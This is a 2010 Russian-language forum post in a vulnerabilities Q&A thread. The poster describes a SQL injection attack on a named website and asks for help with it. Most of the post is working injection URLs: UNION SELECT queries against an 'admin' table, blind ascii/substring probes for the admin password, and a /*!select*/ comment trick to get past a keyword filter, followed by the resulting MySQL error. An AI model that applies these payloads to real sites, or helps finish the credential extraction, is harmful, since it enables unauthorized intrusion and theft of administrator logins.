Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #15394  
Старый 20.10.2010, 21:42
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию
вот такая трабла:

http://www.koisite.info/view_profile1.php?user=-2653%27+union+select+version%28%29+from+admin+limi t+0,1+--+

выводит версию в строку - 2004-00-27 даты

то есть вывод числовых значений без проблем

теперь пробуем вывести имя:

http://www.koisite.info/view_profile1.php?user=-2653'+union+select+loginname+from+admin+limit+0,1+--+

выводит 0000-00-00

думал попробовать покрутить через подзапросы, не не тут то было

http://www.koisite.info/view_profile1.php?user=2653%27+and%20substring%28v ersion%28%29,1,1%29=4+--+

выводит профиль

http://www.koisite.info/view_profile1.php?user=2653%27+and+ascii%28substri ng%28%28select%20pwd%20from%20admin+limit+0,1%29,1 ,1%29%29%3E0+--+

ругается и обрезает все что идет до select

http://www.koisite.info/view_profile1.php?user=2653%27+and+ascii%28substri ng%28%28/*!select*/%20pwd%20from%20admin+limit+0,1%29,1,1%29%29%3E0+--+

Цитата:
Сообщение от None  
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'select*/ pwd from admin limit 0,1),1,1))>0 -- '' at line 1
 
Ответить с цитированием